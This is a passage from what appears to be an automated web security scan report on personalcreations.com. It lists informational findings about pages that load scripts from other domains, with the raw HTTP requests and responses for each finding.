<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

19.15. http://www.personalcreations.com/apparel-gifts-her-PHERAPP previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/apparel-gifts-her-PHERAPP

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /apparel-gifts-her-PHERAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:28 PM?0&9/3/2011 6:30:05 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:30:04 GMT
Connection: close
Content-Length: 280083

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.16. http://www.personalcreations.com/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /default.aspx HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:18:52 GMT
Connection: close
Content-Length: 152061

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<div class="heroElements">
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.17. http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/grandparents-day-gifts-PGDPDAY

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /grandparents-day-gifts-PGDPDAY HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:41 GMT
Connection: close
Content-Length: 243187

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.18. http://www.personalcreations.com/halloween-home-decorations-PHALHOM previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/halloween-home-decorations-PHALHOM

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
